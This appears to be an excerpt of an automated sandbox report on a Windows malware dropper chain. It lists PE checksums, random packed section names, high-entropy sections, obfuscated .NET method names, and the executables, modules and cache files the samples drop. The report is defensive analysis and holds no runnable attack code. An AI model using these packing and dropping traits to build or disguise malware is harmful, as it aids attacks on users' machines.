                        Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                        Source: wOKhy9f[1].exe.4.drStatic PE information: real checksum: 0x0 should be: 0xe493
                        Source: K6UAlAU[1].exe.4.drStatic PE information: real checksum: 0x0 should be: 0x5ab50
                        Source: f11f18202b.exe.4.drStatic PE information: real checksum: 0x1cb0e2 should be: 0x1cd51f
                        Source: ZiYbk6W[1].exe.4.drStatic PE information: real checksum: 0x1b27fd should be: 0x1b7bb1
                        Source: random[1].exe0.4.drStatic PE information: real checksum: 0x2df901 should be: 0x2e05e2
                        Source: skotes.exe.0.drStatic PE information: real checksum: 0x2e792f should be: 0x2f001c
                        Source: in.exe.22.drStatic PE information: real checksum: 0x0 should be: 0x1c320c
                        Source: 5102d46fb9.exe.4.drStatic PE information: real checksum: 0x2a3521 should be: 0x2a5899
                        Source: random[1].exe1.4.drStatic PE information: real checksum: 0x1cb0e2 should be: 0x1cd51f
                        Source: 7z.dll.7.drStatic PE information: real checksum: 0x0 should be: 0x1a2c6b
                        Source: AzVRM7c[1].exe.4.drStatic PE information: real checksum: 0x0 should be: 0x9f7ff
                        Source: 94CwbGg[1].exe.4.drStatic PE information: real checksum: 0x54d1c1 should be: 0x56040e
                        Source: random[2].exe1.4.drStatic PE information: real checksum: 0x2a3521 should be: 0x2a5899
                        Source: axplong.exe.5.drStatic PE information: real checksum: 0x2df901 should be: 0x2e05e2
                        Source: 0d47c4c34f.exe.4.drStatic PE information: real checksum: 0x2df901 should be: 0x2e05e2
                        Source: file.exeStatic PE information: real checksum: 0x2e792f should be: 0x2f001c
                        Source: ZiYbk6W.exe.4.drStatic PE information: real checksum: 0x1b27fd should be: 0x1b7bb1
                        Source: random[2].exe.4.drStatic PE information: real checksum: 0x1cd2c6 should be: 0x1cd408
                        Source: 7z.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x7b29e
                        Source: a4bd6a9bcb.exe.4.drStatic PE information: real checksum: 0x1a9501 should be: 0x1a9c25
                        Source: dwVrTdy.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x9f7ff
                        Source: K6UAlAU.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x5ab50
                        Source: t5abhIx.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x9f7ff
                        Source: 94CwbGg.exe.4.drStatic PE information: real checksum: 0x54d1c1 should be: 0x56040e
                        Source: wOKhy9f.exe.4.drStatic PE information: real checksum: 0x0 should be: 0xe493
                        Source: H9TU4oY[1].exe.4.drStatic PE information: real checksum: 0x1cb0e2 should be: 0x1cd51f
                        Source: t5abhIx[1].exe.4.drStatic PE information: real checksum: 0x0 should be: 0x9f7ff
                        Source: 3a4323f24d.exe.4.drStatic PE information: real checksum: 0x1cd2c6 should be: 0x1cd408
                        Source: dwVrTdy[1].exe.4.drStatic PE information: real checksum: 0x0 should be: 0x9f7ff
                        Source: AzVRM7c.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x9f7ff
                        Source: H9TU4oY.exe.4.drStatic PE information: real checksum: 0x1cb0e2 should be: 0x1cd51f
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name: .idata
                        Source: file.exeStatic PE information: section name: syfpipoa
                        Source: file.exeStatic PE information: section name: kqlprvhw
                        Source: file.exeStatic PE information: section name: .taggant
                        Source: skotes.exe.0.drStatic PE information: section name:
                        Source: skotes.exe.0.drStatic PE information: section name: .idata
                        Source: skotes.exe.0.drStatic PE information: section name: syfpipoa
                        Source: skotes.exe.0.drStatic PE information: section name: kqlprvhw
                        Source: skotes.exe.0.drStatic PE information: section name: .taggant
                        Source: random[1].exe0.4.drStatic PE information: section name:
                        Source: random[1].exe0.4.drStatic PE information: section name: .idata
                        Source: random[1].exe0.4.drStatic PE information: section name: ldrpiuby
                        Source: random[1].exe0.4.drStatic PE information: section name: cguvigub
                        Source: random[1].exe0.4.drStatic PE information: section name: .taggant
                        Source: 0d47c4c34f.exe.4.drStatic PE information: section name:
                        Source: 0d47c4c34f.exe.4.drStatic PE information: section name: .idata
                        Source: 0d47c4c34f.exe.4.drStatic PE information: section name: ldrpiuby
                        Source: 0d47c4c34f.exe.4.drStatic PE information: section name: cguvigub
                        Source: 0d47c4c34f.exe.4.drStatic PE information: section name: .taggant
                        Source: K6UAlAU[1].exe.4.drStatic PE information: section name: .x64
                        Source: K6UAlAU.exe.4.drStatic PE information: section name: .x64
                        Source: H9TU4oY[1].exe.4.drStatic PE information: section name:
                        Source: H9TU4oY[1].exe.4.drStatic PE information: section name: .idata
                        Source: H9TU4oY[1].exe.4.drStatic PE information: section name:
                        Source: H9TU4oY[1].exe.4.drStatic PE information: section name: ubvmxkob
                        Source: H9TU4oY[1].exe.4.drStatic PE information: section name: xdawalmh
                        Source: H9TU4oY[1].exe.4.drStatic PE information: section name: .taggant
                        Source: H9TU4oY.exe.4.drStatic PE information: section name:
                        Source: H9TU4oY.exe.4.drStatic PE information: section name: .idata
                        Source: H9TU4oY.exe.4.drStatic PE information: section name:
                        Source: H9TU4oY.exe.4.drStatic PE information: section name: ubvmxkob
                        Source: H9TU4oY.exe.4.drStatic PE information: section name: xdawalmh
                        Source: H9TU4oY.exe.4.drStatic PE information: section name: .taggant
                        Source: ZiYbk6W[1].exe.4.drStatic PE information: section name:
                        Source: ZiYbk6W[1].exe.4.drStatic PE information: section name: .idata
                        Source: ZiYbk6W[1].exe.4.drStatic PE information: section name:
                        Source: ZiYbk6W[1].exe.4.drStatic PE information: section name: frbjvewh
                        Source: ZiYbk6W[1].exe.4.drStatic PE information: section name: odinhcyc
                        Source: ZiYbk6W[1].exe.4.drStatic PE information: section name: .taggant
                        Source: ZiYbk6W.exe.4.drStatic PE information: section name:
                        Source: ZiYbk6W.exe.4.drStatic PE information: section name: .idata
                        Source: ZiYbk6W.exe.4.drStatic PE information: section name:
                        Source: ZiYbk6W.exe.4.drStatic PE information: section name: frbjvewh
                        Source: ZiYbk6W.exe.4.drStatic PE information: section name: odinhcyc
                        Source: ZiYbk6W.exe.4.drStatic PE information: section name: .taggant
                        Source: random[1].exe1.4.drStatic PE information: section name:
                        Source: random[1].exe1.4.drStatic PE information: section name: .idata
                        Source: random[1].exe1.4.drStatic PE information: section name:
                        Source: random[1].exe1.4.drStatic PE information: section name: ubvmxkob
                        Source: random[1].exe1.4.drStatic PE information: section name: xdawalmh
                        Source: random[1].exe1.4.drStatic PE information: section name: .taggant
                        Source: LoaderClient[1].exe.4.drStatic PE information: section name: _RDATA
                        Source: LoaderClient.exe.4.drStatic PE information: section name: _RDATA
                        Source: f11f18202b.exe.4.drStatic PE information: section name:
                        Source: f11f18202b.exe.4.drStatic PE information: section name: .idata
                        Source: f11f18202b.exe.4.drStatic PE information: section name:
                        Source: f11f18202b.exe.4.drStatic PE information: section name: ubvmxkob
                        Source: f11f18202b.exe.4.drStatic PE information: section name: xdawalmh
                        Source: f11f18202b.exe.4.drStatic PE information: section name: .taggant
                        Source: random[2].exe.4.drStatic PE information: section name:
                        Source: random[2].exe.4.drStatic PE information: section name: .idata
                        Source: random[2].exe.4.drStatic PE information: section name:
                        Source: random[2].exe.4.drStatic PE information: section name: jaliwopm
                        Source: random[2].exe.4.drStatic PE information: section name: chtmvbnb
                        Source: random[2].exe.4.drStatic PE information: section name: .taggant
                        Source: 3a4323f24d.exe.4.drStatic PE information: section name:
                        Source: 3a4323f24d.exe.4.drStatic PE information: section name: .idata
                        Source: 3a4323f24d.exe.4.drStatic PE information: section name:
                        Source: 3a4323f24d.exe.4.drStatic PE information: section name: jaliwopm
                        Source: 3a4323f24d.exe.4.drStatic PE information: section name: chtmvbnb
                        Source: 3a4323f24d.exe.4.drStatic PE information: section name: .taggant
                        Source: a4bd6a9bcb.exe.4.drStatic PE information: section name:
                        Source: a4bd6a9bcb.exe.4.drStatic PE information: section name: .idata
                        Source: a4bd6a9bcb.exe.4.drStatic PE information: section name:
                        Source: a4bd6a9bcb.exe.4.drStatic PE information: section name: asolipax
                        Source: a4bd6a9bcb.exe.4.drStatic PE information: section name: akodwsqo
                        Source: a4bd6a9bcb.exe.4.drStatic PE information: section name: .taggant
                        Source: random[2].exe1.4.drStatic PE information: section name:
                        Source: random[2].exe1.4.drStatic PE information: section name: .idata
                        Source: random[2].exe1.4.drStatic PE information: section name: eacxpgzo
                        Source: random[2].exe1.4.drStatic PE information: section name: bagugiyz
                        Source: random[2].exe1.4.drStatic PE information: section name: .taggant
                        Source: 5102d46fb9.exe.4.drStatic PE information: section name:
                        Source: 5102d46fb9.exe.4.drStatic PE information: section name: .idata
                        Source: 5102d46fb9.exe.4.drStatic PE information: section name: eacxpgzo
                        Source: 5102d46fb9.exe.4.drStatic PE information: section name: bagugiyz
                        Source: 5102d46fb9.exe.4.drStatic PE information: section name: .taggant
                        Source: axplong.exe.5.drStatic PE information: section name:
                        Source: axplong.exe.5.drStatic PE information: section name: .idata
                        Source: axplong.exe.5.drStatic PE information: section name: ldrpiuby
                        Source: axplong.exe.5.drStatic PE information: section name: cguvigub
                        Source: axplong.exe.5.drStatic PE information: section name: .taggant
                        Source: in.exe.22.drStatic PE information: section name: UPX2
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067D91C push ecx; ret 0_2_0067D92F
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00671359 push es; ret 0_2_0067135A
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_009DD91C push ecx; ret 2_2_009DD92F
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_009DD91C push ecx; ret 3_2_009DD92F
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeCode function: 5_2_000CD84C push ecx; ret 5_2_000CD85F
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeCode function: 5_2_000C122F pushad ; ret 5_2_000C1230
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeCode function: 5_2_000C0B3B push esp; retf 0000h5_2_000C0B3C
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0064D84C push ecx; ret 6_2_0064D85F
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_0064D84C push ecx; ret 8_2_0064D85F
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B7676A push rcx; ret 12_2_00B7676B
                        Source: file.exeStatic PE information: section name: entropy: 7.986233657501117
                        Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.986233657501117
                        Source: random[1].exe0.4.drStatic PE information: section name: entropy: 7.971213114861191
                        Source: 0d47c4c34f.exe.4.drStatic PE information: section name: entropy: 7.971213114861191
                        Source: Bxq1jd2[1].exe.4.drStatic PE information: section name: .text entropy: 7.203655785812803
                        Source: Bxq1jd2.exe.4.drStatic PE information: section name: .text entropy: 7.203655785812803
                        Source: EkmIhQM[1].exe.4.drStatic PE information: section name: .text entropy: 7.764107996728332
                        Source: EkmIhQM.exe.4.drStatic PE information: section name: .text entropy: 7.764107996728332
                        Source: H9TU4oY[1].exe.4.drStatic PE information: section name: entropy: 7.985148780171564
                        Source: H9TU4oY[1].exe.4.drStatic PE information: section name: ubvmxkob entropy: 7.95406419852494
                        Source: H9TU4oY.exe.4.drStatic PE information: section name: entropy: 7.985148780171564
                        Source: H9TU4oY.exe.4.drStatic PE information: section name: ubvmxkob entropy: 7.95406419852494
                        Source: ZiYbk6W[1].exe.4.drStatic PE information: section name: entropy: 7.969631754503492
                        Source: ZiYbk6W[1].exe.4.drStatic PE information: section name: frbjvewh entropy: 7.952884214471302
                        Source: ZiYbk6W.exe.4.drStatic PE information: section name: entropy: 7.969631754503492
                        Source: ZiYbk6W.exe.4.drStatic PE information: section name: frbjvewh entropy: 7.952884214471302
                        Source: random[1].exe1.4.drStatic PE information: section name: entropy: 7.985148780171564
                        Source: random[1].exe1.4.drStatic PE information: section name: ubvmxkob entropy: 7.95406419852494
                        Source: f11f18202b.exe.4.drStatic PE information: section name: entropy: 7.985148780171564
                        Source: f11f18202b.exe.4.drStatic PE information: section name: ubvmxkob entropy: 7.95406419852494
                        Source: random[2].exe.4.drStatic PE information: section name: entropy: 7.98575532392403
                        Source: random[2].exe.4.drStatic PE information: section name: jaliwopm entropy: 7.954155060928768
                        Source: 3a4323f24d.exe.4.drStatic PE information: section name: entropy: 7.98575532392403
                        Source: 3a4323f24d.exe.4.drStatic PE information: section name: jaliwopm entropy: 7.954155060928768
                        Source: a4bd6a9bcb.exe.4.drStatic PE information: section name: asolipax entropy: 7.953155373076256
                        Source: random[2].exe1.4.drStatic PE information: section name: entropy: 7.776371775944125
                        Source: 5102d46fb9.exe.4.drStatic PE information: section name: entropy: 7.776371775944125
                        Source: axplong.exe.5.drStatic PE information: section name: entropy: 7.971213114861191
                        Source: EkmIhQM[1].exe.4.dr, UserControlAuth.csHigh entropy of concatenated method names: 'Dispose', 'InitializeComponent', 'UUg8DmXXLZLOa72s7G', 'HQHXycUecMeFLqNjcw', 'vdgj2NOotXmGReC3ag', 'HeUqsUZPHVVXjA7dWs', 'n9UurTBEWlJ5xugavv', 'iYCXPgeooHJFKuRSfj', 'n0sZccxh1H3Zwdqls7', 'fKrnHI2hOu4JHXK1re'
                        Source: EkmIhQM[1].exe.4.dr, xRXfN.csHigh entropy of concatenated method names: 'Main', 'TFGFGriaaaa5aaa6ap78DS9DSFlesdsds', 'QozeXwardnBaTanya', 'tFJD9gNgXNq2UZCYVC', 'oelT7ooeWj1JYRk0A9', 'wdPCYEhRRiHSS8svkU', 'RHQULyH6bxvF3UgEWt', 'xR9GnqEtaKdkijRmbF', 'i3LR3ZkWPggiRIoVvN', 'Jd9Ita44fEekJmoGV6'
                        Source: EkmIhQM[1].exe.4.dr, RazorEditorParser.csHigh entropy of concatenated method names: 'CreateAndStart', 'Dispose', 'nHjJSAMQ1igmmtr5D2q', 'h7BZdPM3QX0Ufrp3RaR', 'lMrHnoMm8aNM0A7VWOx', 'CYrRX5M5ZaME6JqDl7s', 'xODsEeMgJLaaFFf6orw', 'GetAutoCompleteString', 'CheckForStructureChanges', 'VerifyFlagsAreValid'
                        Source: EkmIhQM[1].exe.4.dr, TextBufferReader.csHigh entropy of concatenated method names: 'bKE3QSa12kExNb1VcAh', 'JRIjYYasnO81D9pqwfX', 'Peek', 'Read', 'Dispose', 'BeginLookahead', 'CancelBacktrack', 'EndLookahead', 'Rp9XGGaOA3mug3Hg3Wu', 'RF7CV3aZuI15KfbLAm5'
                        Source: EkmIhQM[1].exe.4.dr, TextChange.csHigh entropy of concatenated method names: 'Equals', 'ApplyChange', 'ApplyChange', 'GetHashCode', 'ToString', 'Normalize', 'GetText', 'YS5M9sA4cphMOkPtYEA', 'MWImYsAd87dbxtgFaWE', 'I5XrQYAcEMBR9osUPWV'
                        Source: EkmIhQM[1].exe.4.dr, BufferingTextReader.csHigh entropy of concatenated method names: 'TXtC1vitZlbjhQeYar2', 'dU3N1fiL851SfFidsvc', 'Read', 'Peek', 'Dispose', 'BeginLookahead', 'CancelBacktrack', 'EndLookahead', 'NextCharacter', 'ExpandBuffer'
                        Source: EkmIhQM[1].exe.4.dr, GeneratedCodeMapping.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'k0PwsDMeyNZTZrSdiJC', 'o8K7RKMx1u5yQ2HfaZ5', 'uGHIIIM2rjxHGpJq7Q7', 'LSjPncMtlQ4JnoWMgeh', 'tFNiwnML2jdVi0eg66q', 'L7ob92M1WDxrqNUpClN'
                        Source: EkmIhQM[1].exe.4.dr, VBRazorCodeGenerator.csHigh entropy of concatenated method names: 'CreateCodeWriter', 'WriteHelperVariable', 'VisitSpan', 'VisitSpan', 'sLxMjNALAI2RlRi0olh', 'dkW8pdA1TK9cRLeteZt', 'Y5tXI8AsTfUh0KgSoBW', 'qJplEpAwSkGCvLbyegV', 'mUhrm9AfWxhBJQiLEGN', 'Ym3nYEAuEOEetj2DyGe'
                        Source: EkmIhQM[1].exe.4.dr, CSharpRazorCodeGenerator.csHigh entropy of concatenated method names: 'CreateCodeWriter', 'WriteHelperVariable', 'yG1QaADj7wvODb4R9Ik', 'd6tM4oD0ALikI0mBP1P', 'PxiMEIDIAh2HAaxnBpo', 'HHsAW5DRdLg5k7MCAvO', 'Y9HGhrD8BZm7MS16QWT', 'sjbUU7Dvx64aDrCrRvI', 'MW2uJODrT91fvpeRiGN', 'evonwuDNHg5qXDBZDDo'
                        Source: EkmIhQM[1].exe.4.dr, RazorCodeGenerator.csHigh entropy of concatenated method names: 'ynePkGbbNEJSgWIvwf7', 'of7fdpbDCbvdXPU4ysL', 'VisitSpan', 'MarkStartGeneratedCode', 'MarkEndGeneratedCode', 'ResetBuffer', 'IsContentSpan', 'gfNap7bay30SZRE07xu', 'WolnGVbYWX7WcIBj6Fw', 'EyPTrObAcKGIyPGp2LL'
                        Source: EkmIhQM[1].exe.4.dr, mEqmoE9UxRmX9ogcto.csHigh entropy of concatenated method names: 'Q5MkM5QYd3', 'qDhjp4lmAjYcpcwFN1v', 'HBBFPFl5dykXMmDGX1N', 'SF0FMLlgCdI8XwcjsEo', 'Gdr5FIlJcSjrgL6GUlc', 'fHSkdAnkJf', 'k96k7mkjK6', 't26kG3LxyN', 'WBQk3NCaKd', 'AgYkLp4qOr'
                        Source: EkmIhQM[1].exe.4.dr, ParserContext.csHigh entropy of concatenated method names: 'GUeVUnaGvdQ7Eoj5vYg', 'IPru3mayWROE934fN9y', 'StartTemporaryBuffer', 'AcceptTemporaryBuffer', 'AcceptCurrent', 'Append', 'OutputSpan', 'ResumeSpan', 'StartBlock', 'PushVisitor'
                        Source: EkmIhQM[1].exe.4.dr, ParserBase.csHigh entropy of concatenated method names: 'IsAtExplicitTransition', 'IsAtImplicitTransition', 'IsAtTransition', 'NextIsTransition', 'ParseBlock', 'StartBlock', 'StartBlock', 'EndBlock', 'Output', 'OnError'
                        Source: EkmIhQM[1].exe.4.dr, HtmlMarkupParser.csHigh entropy of concatenated method names: 'sUVFd9A03p1SINum7Og', 'BmdB6aAILou36sw1IDJ', 'IsAtExplicitTransition', 'IsAtImplicitTransition', 'ParseSection', 'ParseDocument', 'ParseRootBlock', 'ParseBlock', 'IsStartTag', 'IsEndTag'
                        Source: EkmIhQM[1].exe.4.dr, VBCodeParser.csHigh entropy of concatenated method names: 'IsAtExplicitTransition', 'IsAtImplicitTransition', 'ParseBlock', 'TryAcceptStringOrComment', 'HandleTransition', 'HandleTransitionCore', 'HandleReservedWord', 'ParseHelperBlock', 'ParseImplicitBlock', 'ParseSectionStatement'
                        Source: EkmIhQM[1].exe.4.dr, CSharpCodeParser.csHigh entropy of concatenated method names: 'IsAtExplicitTransition', 'IsAtImplicitTransition', 'TryRecover', 'ParseBlock', 'WrapSimpleBlockParser', 'HandleReservedWord', 'ParseInheritsStatement', 'ParseImplicitExpression', 'ParseImplicitExpression', 'ParseStatement'
                        Source: EkmIhQM[1].exe.4.dr, hrwN54ssk66JhR0d65a.csHigh entropy of concatenated method names: 'lLHifFIsCLsZtjvFfN0i', 'tsFkXCLB65', 'V2hk1qXaN6', 'iLd0d8WDP379kn9xhYl', 'HbuRd6WiEhZDXVplODc', 'YtFiFSWajlbN7lh75cO', 'xpQHYeWYVNv0F7qe2by', 'q1U0gcWALoo0nnYdTya', 'bPLigaWKwlSJZjPYq6A', 'uSI0PxWliFqjPtWleMu'
                        Source: EkmIhQM[1].exe.4.dr, VBOptionSpan.csHigh entropy of concatenated method names: 'Create', 'Equals', 'ToString', 'GetHashCode', 'fMpXkZCBAIh8evjsXOD', 'sc3MAMCecxSxotGHmBr', 'nSL9faCx8D8WGw0LJew', 'pZcyY1C2qBiFlTZI976', 'Q7vwxNCtNGqofUgifiE'
                        Source: EkmIhQM[1].exe.4.dr, Span.csHigh entropy of concatenated method names: 'Accept', 'ApplyChange', 'ApplyChange', 'CanAcceptChange', 'UpdateContent', 'OwnsChange', 'ToString', 'Equals', 'GetHashCode', 'TryMergeWith'
                        Source: EkmIhQM[1].exe.4.dr, NamespaceImportSpan.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'ToString', 'Create', 'hR8Tx3MALfcsYx5xHWL', 'B9CXJPMKLD0BKkeoGbd', 'fNOSr8MlJYZ2ywSoGbE', 'JGvNxdMWcpHKOMj00rj', 'dogBTaMGVp7jsdRiIEU', 'Ph4hPIMyFhLmGoeDpc9'
                        Source: EkmIhQM.exe.4.dr, UserControlAuth.csHigh entropy of concatenated method names: 'Dispose', 'InitializeComponent', 'UUg8DmXXLZLOa72s7G', 'HQHXycUecMeFLqNjcw', 'vdgj2NOotXmGReC3ag', 'HeUqsUZPHVVXjA7dWs', 'n9UurTBEWlJ5xugavv', 'iYCXPgeooHJFKuRSfj', 'n0sZccxh1H3Zwdqls7', 'fKrnHI2hOu4JHXK1re'
                        Source: EkmIhQM.exe.4.dr, xRXfN.csHigh entropy of concatenated method names: 'Main', 'TFGFGriaaaa5aaa6ap78DS9DSFlesdsds', 'QozeXwardnBaTanya', 'tFJD9gNgXNq2UZCYVC', 'oelT7ooeWj1JYRk0A9', 'wdPCYEhRRiHSS8svkU', 'RHQULyH6bxvF3UgEWt', 'xR9GnqEtaKdkijRmbF', 'i3LR3ZkWPggiRIoVvN', 'Jd9Ita44fEekJmoGV6'
                        Source: EkmIhQM.exe.4.dr, RazorEditorParser.csHigh entropy of concatenated method names: 'CreateAndStart', 'Dispose', 'nHjJSAMQ1igmmtr5D2q', 'h7BZdPM3QX0Ufrp3RaR', 'lMrHnoMm8aNM0A7VWOx', 'CYrRX5M5ZaME6JqDl7s', 'xODsEeMgJLaaFFf6orw', 'GetAutoCompleteString', 'CheckForStructureChanges', 'VerifyFlagsAreValid'
                        Source: EkmIhQM.exe.4.dr, TextBufferReader.csHigh entropy of concatenated method names: 'bKE3QSa12kExNb1VcAh', 'JRIjYYasnO81D9pqwfX', 'Peek', 'Read', 'Dispose', 'BeginLookahead', 'CancelBacktrack', 'EndLookahead', 'Rp9XGGaOA3mug3Hg3Wu', 'RF7CV3aZuI15KfbLAm5'
                        Source: EkmIhQM.exe.4.dr, TextChange.csHigh entropy of concatenated method names: 'Equals', 'ApplyChange', 'ApplyChange', 'GetHashCode', 'ToString', 'Normalize', 'GetText', 'YS5M9sA4cphMOkPtYEA', 'MWImYsAd87dbxtgFaWE', 'I5XrQYAcEMBR9osUPWV'
                        Source: EkmIhQM.exe.4.dr, BufferingTextReader.csHigh entropy of concatenated method names: 'TXtC1vitZlbjhQeYar2', 'dU3N1fiL851SfFidsvc', 'Read', 'Peek', 'Dispose', 'BeginLookahead', 'CancelBacktrack', 'EndLookahead', 'NextCharacter', 'ExpandBuffer'
                        Source: EkmIhQM.exe.4.dr, GeneratedCodeMapping.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'k0PwsDMeyNZTZrSdiJC', 'o8K7RKMx1u5yQ2HfaZ5', 'uGHIIIM2rjxHGpJq7Q7', 'LSjPncMtlQ4JnoWMgeh', 'tFNiwnML2jdVi0eg66q', 'L7ob92M1WDxrqNUpClN'
                        Source: EkmIhQM.exe.4.dr, VBRazorCodeGenerator.csHigh entropy of concatenated method names: 'CreateCodeWriter', 'WriteHelperVariable', 'VisitSpan', 'VisitSpan', 'sLxMjNALAI2RlRi0olh', 'dkW8pdA1TK9cRLeteZt', 'Y5tXI8AsTfUh0KgSoBW', 'qJplEpAwSkGCvLbyegV', 'mUhrm9AfWxhBJQiLEGN', 'Ym3nYEAuEOEetj2DyGe'
                        Source: EkmIhQM.exe.4.dr, CSharpRazorCodeGenerator.csHigh entropy of concatenated method names: 'CreateCodeWriter', 'WriteHelperVariable', 'yG1QaADj7wvODb4R9Ik', 'd6tM4oD0ALikI0mBP1P', 'PxiMEIDIAh2HAaxnBpo', 'HHsAW5DRdLg5k7MCAvO', 'Y9HGhrD8BZm7MS16QWT', 'sjbUU7Dvx64aDrCrRvI', 'MW2uJODrT91fvpeRiGN', 'evonwuDNHg5qXDBZDDo'
                        Source: EkmIhQM.exe.4.dr, RazorCodeGenerator.csHigh entropy of concatenated method names: 'ynePkGbbNEJSgWIvwf7', 'of7fdpbDCbvdXPU4ysL', 'VisitSpan', 'MarkStartGeneratedCode', 'MarkEndGeneratedCode', 'ResetBuffer', 'IsContentSpan', 'gfNap7bay30SZRE07xu', 'WolnGVbYWX7WcIBj6Fw', 'EyPTrObAcKGIyPGp2LL'
                        Source: EkmIhQM.exe.4.dr, mEqmoE9UxRmX9ogcto.csHigh entropy of concatenated method names: 'Q5MkM5QYd3', 'qDhjp4lmAjYcpcwFN1v', 'HBBFPFl5dykXMmDGX1N', 'SF0FMLlgCdI8XwcjsEo', 'Gdr5FIlJcSjrgL6GUlc', 'fHSkdAnkJf', 'k96k7mkjK6', 't26kG3LxyN', 'WBQk3NCaKd', 'AgYkLp4qOr'
                        Source: EkmIhQM.exe.4.dr, ParserContext.csHigh entropy of concatenated method names: 'GUeVUnaGvdQ7Eoj5vYg', 'IPru3mayWROE934fN9y', 'StartTemporaryBuffer', 'AcceptTemporaryBuffer', 'AcceptCurrent', 'Append', 'OutputSpan', 'ResumeSpan', 'StartBlock', 'PushVisitor'
                        Source: EkmIhQM.exe.4.dr, ParserBase.csHigh entropy of concatenated method names: 'IsAtExplicitTransition', 'IsAtImplicitTransition', 'IsAtTransition', 'NextIsTransition', 'ParseBlock', 'StartBlock', 'StartBlock', 'EndBlock', 'Output', 'OnError'
                        Source: EkmIhQM.exe.4.dr, HtmlMarkupParser.csHigh entropy of concatenated method names: 'sUVFd9A03p1SINum7Og', 'BmdB6aAILou36sw1IDJ', 'IsAtExplicitTransition', 'IsAtImplicitTransition', 'ParseSection', 'ParseDocument', 'ParseRootBlock', 'ParseBlock', 'IsStartTag', 'IsEndTag'
                        Source: EkmIhQM.exe.4.dr, VBCodeParser.csHigh entropy of concatenated method names: 'IsAtExplicitTransition', 'IsAtImplicitTransition', 'ParseBlock', 'TryAcceptStringOrComment', 'HandleTransition', 'HandleTransitionCore', 'HandleReservedWord', 'ParseHelperBlock', 'ParseImplicitBlock', 'ParseSectionStatement'
                        Source: EkmIhQM.exe.4.dr, CSharpCodeParser.csHigh entropy of concatenated method names: 'IsAtExplicitTransition', 'IsAtImplicitTransition', 'TryRecover', 'ParseBlock', 'WrapSimpleBlockParser', 'HandleReservedWord', 'ParseInheritsStatement', 'ParseImplicitExpression', 'ParseImplicitExpression', 'ParseStatement'
                        Source: EkmIhQM.exe.4.dr, hrwN54ssk66JhR0d65a.csHigh entropy of concatenated method names: 'lLHifFIsCLsZtjvFfN0i', 'tsFkXCLB65', 'V2hk1qXaN6', 'iLd0d8WDP379kn9xhYl', 'HbuRd6WiEhZDXVplODc', 'YtFiFSWajlbN7lh75cO', 'xpQHYeWYVNv0F7qe2by', 'q1U0gcWALoo0nnYdTya', 'bPLigaWKwlSJZjPYq6A', 'uSI0PxWliFqjPtWleMu'
                        Source: EkmIhQM.exe.4.dr, VBOptionSpan.csHigh entropy of concatenated method names: 'Create', 'Equals', 'ToString', 'GetHashCode', 'fMpXkZCBAIh8evjsXOD', 'sc3MAMCecxSxotGHmBr', 'nSL9faCx8D8WGw0LJew', 'pZcyY1C2qBiFlTZI976', 'Q7vwxNCtNGqofUgifiE'
                        Source: EkmIhQM.exe.4.dr, Span.csHigh entropy of concatenated method names: 'Accept', 'ApplyChange', 'ApplyChange', 'CanAcceptChange', 'UpdateContent', 'OwnsChange', 'ToString', 'Equals', 'GetHashCode', 'TryMergeWith'
                        Source: EkmIhQM.exe.4.dr, NamespaceImportSpan.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'ToString', 'Create', 'hR8Tx3MALfcsYx5xHWL', 'B9CXJPMKLD0BKkeoGbd', 'fNOSr8MlJYZ2ywSoGbE', 'JGvNxdMWcpHKOMj00rj', 'dogBTaMGVp7jsdRiIEU', 'Ph4hPIMyFhLmGoeDpc9'
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1

                        Persistence and Installation Behavior

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeProcess created: "C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\Bxq1jd2[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_Salsa20.pydJump to dropped file
